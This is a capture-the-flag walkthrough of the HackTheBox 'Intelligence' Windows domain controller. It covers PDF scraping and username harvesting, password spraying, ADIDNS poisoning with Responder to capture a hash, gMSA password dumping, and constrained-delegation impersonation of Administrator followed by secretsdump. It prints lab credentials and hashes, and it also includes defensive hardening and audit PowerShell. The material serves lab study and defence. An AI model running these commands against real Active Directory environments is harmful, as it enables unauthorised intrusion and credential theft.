Intelligence

Operating system: Windows
Difficulty: Medium
Release date: 03 July 2021
Creator: Micah

Port scan

nmap -sS -p- --open -Pn -n --min-rate 5000 -oG openPorts -vvv 10.10.10.248
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-11 22:41 -03
Initiating SYN Stealth Scan at 22:41
Scanning 10.10.10.248 [65535 ports]
Discovered open port 80/tcp on 10.10.10.248
Discovered open port 53/tcp on 10.10.10.248
Discovered open port 139/tcp on 10.10.10.248
Discovered open port 135/tcp on 10.10.10.248
Discovered open port 445/tcp on 10.10.10.248
Discovered open port 49667/tcp on 10.10.10.248
Discovered open port 49717/tcp on 10.10.10.248
Discovered open port 636/tcp on 10.10.10.248
Discovered open port 49692/tcp on 10.10.10.248
Discovered open port 389/tcp on 10.10.10.248
Discovered open port 9389/tcp on 10.10.10.248
Discovered open port 49711/tcp on 10.10.10.248
Discovered open port 88/tcp on 10.10.10.248
Discovered open port 3268/tcp on 10.10.10.248
Discovered open port 593/tcp on 10.10.10.248
Discovered open port 49691/tcp on 10.10.10.248
Discovered open port 49740/tcp on 10.10.10.248
Discovered open port 3269/tcp on 10.10.10.248
Discovered open port 464/tcp on 10.10.10.248
Completed SYN Stealth Scan at 22:42, 27.46s elapsed (65535 total ports)
Nmap scan report for 10.10.10.248
Host is up, received user-set (0.21s latency).
Scanned at 2025-04-11 22:41:44 -03 for 28s
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE          REASON
53/tcp    open  domain           syn-ack ttl 127
80/tcp    open  http             syn-ack ttl 127
88/tcp    open  kerberos-sec     syn-ack ttl 127
135/tcp   open  msrpc            syn-ack ttl 127
139/tcp   open  netbios-ssn      syn-ack ttl 127
389/tcp   open  ldap             syn-ack ttl 127
445/tcp   open  microsoft-ds     syn-ack ttl 127
464/tcp   open  kpasswd5         syn-ack ttl 127
593/tcp   open  http-rpc-epmap   syn-ack ttl 127
636/tcp   open  ldapssl          syn-ack ttl 127
3268/tcp  open  globalcatLDAP    syn-ack ttl 127
3269/tcp  open  globalcatLDAPssl syn-ack ttl 127
9389/tcp  open  adws             syn-ack ttl 127
49667/tcp open  unknown          syn-ack ttl 127
49691/tcp open  unknown          syn-ack ttl 127
49692/tcp open  unknown          syn-ack ttl 127
49711/tcp open  unknown          syn-ack ttl 127
49717/tcp open  unknown          syn-ack ttl 127
49740/tcp open  unknown          syn-ack ttl 127

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 27.54 seconds
           Raw packets sent: 131064 (5.767MB) | Rcvd: 32 (1.408KB)

Service and version enumeration

nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,9389,49667,49691,49692,49711,49717,49740 -oN servicesScan 10.10.10.248
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-11 22:43 -03
Nmap scan report for 10.10.10.248 (10.10.10.248)
Host is up (0.15s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-12 08:43:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-12T08:45:09+00:00; +7h00m17s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-12T08:45:07+00:00; +7h00m17s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-12T08:45:09+00:00; +7h00m17s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-04-12T08:45:07+00:00; +7h00m17s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49711/tcp open  msrpc         Microsoft Windows RPC
49717/tcp open  msrpc         Microsoft Windows RPC
49740/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-04-12T08:44:31
|_  start_date: N/A
|_clock-skew: mean: 7h00m16s, deviation: 0s, median: 7h00m16s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 99.84 seconds

Initial exploitation

HTTP (80)

echo '10.10.10.248 intelligence.htb dc.intelligence.htb' >> /etc/hosts

Looking at the file's content reveals nothing interesting, but looking at its metadata with exiftool turns up two possible usernames.

We write a script to automate downloading the files.

import os
import requests

BASE_URL = "http://10.10.10.248/documents"
OUT_DIR = "documents"


def download():
    # Create the destination directory so the open() below does not fail
    os.makedirs(OUT_DIR, exist_ok=True)
    for month in range(1, 13):
        for day in range(1, 32):
            # Filenames follow the 2020-MM-DD-upload.pdf pattern seen on the site
            filename = f"2020-{month:02d}-{day:02d}-upload.pdf"
            res = requests.get(f"{BASE_URL}/{filename}")

            if res.status_code == 200:
                print(f"[+] Archivo Encontrado {filename}")
                with open(f"{OUT_DIR}/{filename}", 'wb') as f:
                    f.write(res.content)


if __name__ == '__main__':
    download()

exiftool documents/*.pdf | grep 'Creator' | awk -F: '{print $2}' | sed 's/\s//g' | sort -u | tee ad_users.txt
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee

We write a script to extract the text content of the PDF files.

import os
import time

import pdftotext
from pwn import log

p1 = log.progress("Reading Files...")
time.sleep(2)

# Append the text of every page of every PDF in ./documents to a single file;
# that text is later used as a password wordlist.
with open("pdfs_text.txt", "a") as file_wordlist:
    for entry in os.scandir("./documents"):
        if not entry.name.startswith(".") and entry.is_file():
            with open(entry.path, "rb") as f:
                pdf = pdftotext.PDF(f)

                p1.status(f"Reading File {entry.name}")

                for page in pdf:
                    file_wordlist.write(page)

p1.success("Completed")

Now, with that wordlist, we can do password spraying.

nxc smb 10.10.10.248 -u ad_users.txt -p wordlist.txt --continue-on-success

We enumerate the shares.

smbclient //10.10.10.248/Users -U 'Tiffany.Molina%NewIntelligenceCorpUser9876'

Lateral movement

We enumerate with LDAP.

We enumerate with BloodHound.

After enumerating without finding a viable path, we go back to the downdetector.ps1 script.

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}

This script checks that every web site is up; if one of them is "down", it sends an email to the user Ted.Graves.

The web request is made with -UseDefaultCredentials, i.e. with the credentials of the account running the scheduled task, and the list of hosts comes from every "web*" record in the AD-integrated DNS zone. So if we register a DNS record that points to our machine, we may be able to capture those credentials.
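For contrast, this is how the same check looks without the weakness that the rest of this section abuses. It is an added example, not the script found on the box; the monitored host list and the SMTP server are placeholders.

```powershell
# Hardened rewrite of the downdetector check (added example, not the script found on the box).
# Assumptions: the monitored hosts and the SMTP server below are placeholders.
$MonitoredHosts = @('web01.intelligence.htb', 'web02.intelligence.htb')  # explicit list, not "web*" from ADIDNS
$Mail = @{
    From       = 'Ted.Graves@intelligence.htb'
    To         = 'Ted.Graves@intelligence.htb'
    SmtpServer = 'mail.intelligence.htb'   # placeholder
}

foreach ($hostName in $MonitoredHosts) {
    try {
        # No -UseDefaultCredentials: an availability probe needs no authentication, so a DNS
        # record planted by an authenticated user cannot harvest the task account's NetNTLM hash.
        $response = Invoke-WebRequest -Uri "http://$hostName/" -UseBasicParsing -TimeoutSec 10
        $status   = [int]$response.StatusCode
    }
    catch {
        # Invoke-WebRequest throws on 4xx/5xx and on connection errors; record the status
        # (0 = no HTTP response at all) instead of swallowing the exception with an empty catch.
        $status = if ($_.Exception.Response) { [int]$_.Exception.Response.StatusCode } else { 0 }
    }

    if ($status -ne 200) {
        Send-MailMessage @Mail -Subject "Host: $hostName is down (HTTP $status)"
    }
}
```

Fixing the script is only half of the remediation: by default any authenticated domain user can create records in an AD-integrated DNS zone, so the zone's ACL should be reviewed as well.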

python3 dnstool.py -u intelligence.local\\tiffany.molina -p 'NewIntelligenceCorpUser9876' -r webfake.intelligence.htb -d 10.10.14.2 --action add 10.10.10.248

We start listening with Responder.

responder -I tun0

We capture Ted.Graves's hash.

We crack the hash.

A gMSA (group Managed Service Account) is a special type of service account used to run services or scheduled tasks on domain machines without having to manage their passwords manually.

  • The password of these accounts is not set by an admin; it is generated and rotated automatically by the Domain Controllers.
  • Specific computers or groups in the domain are allowed to retrieve that password in order to run services as that account.

So what BloodHound tells us here is that:

  • A gMSA named SVC_INT$ exists.
  • The ITSUPPORT group has permission to retrieve that account's password.

The intended use of a gMSA is to let certain computer accounts retrieve the gMSA password and then run local services as that account. An attacker who controls one of those authorized accounts can abuse that privilege to impersonate the gMSA.

In this case, I will use the gMSADumper.py tool.

gMSADumper.py -u 'ted.graves' -p 'mr.teddy' -d 'intelligence.htb'

svc_int$:::b05dfb2636385604c6d36b0ca61e35cb

Privilege escalation (root/SYSTEM)

Constrained Delegation

while [ true ]; do sudo ntpdate intelligence.htb; done
impacket-getST -dc-ip 10.10.10.248 intelligence.htb/svc_int\$ -hashes :b05dfb2636385604c6d36b0ca61e35cb -impersonate Administrator -spn 'WWW/dc.intelligence.htb'
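The gMSA section above and this delegation step rest on two directory settings a defender can enumerate directly: who may read each gMSA password, and which accounts hold constrained delegation with protocol transition. The PowerShell below is an added example (not part of the writeup) that lists both; it assumes the RSAT ActiveDirectory module and a domain-joined session.

```powershell
# Added example (not part of the original writeup): audit the two AD settings this privilege
# chain relies on. Requires the RSAT ActiveDirectory module; the domain comes from the session.
Import-Module ActiveDirectory

# 1. Who may read each gMSA password? On this box it was the ITSUPPORT group for SVC_INT$;
#    every member of that group is effectively the service account, so the list should be short
#    and contain only the hosts meant to run the service (sMSAs show an empty Readers column).
Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword |
    ForEach-Object {
        $readers = foreach ($dn in $_.PrincipalsAllowedToRetrieveManagedPassword) {
            (Get-ADObject -Identity $dn -Properties SamAccountName).SamAccountName
        }
        [pscustomobject]@{
            Account = $_.SamAccountName
            Readers = $readers -join ', '
        }
    } | Format-Table -AutoSize

# 2. Which accounts have constrained delegation, and which of those also allow protocol
#    transition (TrustedToAuthForDelegation)? Protocol transition is what lets getST obtain a
#    service ticket as Administrator without Administrator ever authenticating to svc_int$.
$filter = "msDS-AllowedToDelegateTo -like '*'"
$props  = 'msDS-AllowedToDelegateTo', 'TrustedToAuthForDelegation'
@(Get-ADUser           -Filter $filter -Properties $props) +
@(Get-ADComputer       -Filter $filter -Properties $props) +
@(Get-ADServiceAccount -Filter $filter -Properties $props) |
    Select-Object SamAccountName, TrustedToAuthForDelegation,
        @{ Name = 'AllowedToDelegateTo'; Expression = { $_.'msDS-AllowedToDelegateTo' -join ', ' } } |
    Format-Table -AutoSize
```

Any row in the second table with TrustedToAuthForDelegation set to True deserves a review of whether protocol transition is really required, since a constrained-delegation account without it can only delegate users who have actually authenticated to it.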

export KRB5CCNAME=./Administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
impacket-secretsdump -k -no-pass DC.intelligence.htb

We read the root flag.
